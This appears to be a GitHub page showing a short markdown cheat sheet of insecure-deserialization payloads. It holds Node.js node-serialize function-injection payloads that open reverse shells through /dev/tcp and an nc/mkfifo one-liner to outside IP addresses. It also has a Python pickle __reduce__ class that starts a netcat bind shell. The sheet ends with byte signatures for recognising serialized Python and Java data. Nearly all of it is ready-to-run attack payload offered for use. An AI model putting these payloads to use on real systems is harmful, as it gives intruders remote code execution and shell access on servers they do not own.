Skip to content

Latest commit

 

History

History
42 lines (38 loc) · 1.24 KB

deserialization.md

File metadata and controls

42 lines (38 loc) · 1.24 KB
Raw

nodejs

origin:

{"username":"guest","isGuest":false,"encoding": "utf-8"}

attack:

{"username":"guest","isGuest":false,"encoding": "_$$ND_FUNC$$_function (){\n \t require('child_process').exec('bash -c \"sh -i >& /dev/tcp/10.6.22.254/3333 0>&1\"')}()"}

{"username":"guest","isGuest":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('bash -c \"sh -i >& /dev/tcp/10.6.22.254/3333 0>&1\"')}()","encoding": "utf-8"}

{"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('bash -c \"sh -i >& /dev/tcp/10.6.22.254/3333 0>&1\"')}()","isGuest":false,"encoding": "utf-8"}

or:

{"username":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.0.7 4444 >/tmp/f","isGuest":false,"encoding": "utf-8"}

...

python pickle

import pickle, os, base64
class P(object):
    def __reduce__(self):
        return (os.system,("netcat -c '/bin/bash -i' -l -p 1234 ",))
print(base64.b64encode(pickle.dumps(P())))

characteristics

gASV... # python pickle base64
80 04 95 # python pickle

gA... # python pickle base64

rO0... # java base64
ac ed 00 05 # java